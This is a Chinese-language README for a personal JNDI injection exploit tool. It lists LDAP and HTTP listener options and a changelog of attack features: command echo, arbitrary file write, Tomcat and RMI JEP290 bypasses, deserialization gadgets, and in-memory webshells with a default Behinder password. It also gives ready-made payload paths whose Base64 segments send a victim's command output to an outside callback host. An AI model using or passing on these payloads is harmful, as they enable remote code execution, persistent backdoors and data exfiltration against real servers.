这是我一直在用一直更新的一个小工具。不定期更新 (主要看近期有没有学习了......)
Usage: java -jar MYJNDIExploit1.1.jar [options]
Options:
* -i, --ip Local ip address
*
-l, --ldapPort Ldap bind port (default: 1389)
-p, --httpPort Http bind port (default: 8080)
-u, --usage Show usage (default: false)
-h, --help Show this help
-o, --output out put file
-
添加Basic 命令回显 及 文件写入功能
-
添加反序列化 命令回显 及文件写入
-
添加tomcat 命令回显
-
添加动态指定路径class
-
将序列化生成数据写入文件
-
添加额外netty 内存马
-
添加RMI_Bypass_JEP290
修改内存马利用密码:?type=basic&hack=whoami
冰蝎连接: 添加header: User-Agentt 密码:rebeyond 后续会做密码自定义
文件写入 /Basic/PutFile/Path/Content (Path 为Base64, Content 为Base64数据 其中 ‘/’ 用 ‘_]’替换,‘+’用_@_替换)
命令回显 Basic/commandecho/[httplog 回显地址 ]/[command]
demo:Basic/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=
tomcat也一样:TomcatBypass/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=
Deserialization/CommonsCollectionsK1/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=
内存正向代理:/Basic/filetertunnel
动态指定路径:自定义class 存放在当前jar 同路径里的lib文件内
/Basic/myclass/Exp
- 内存马密码可由用户控制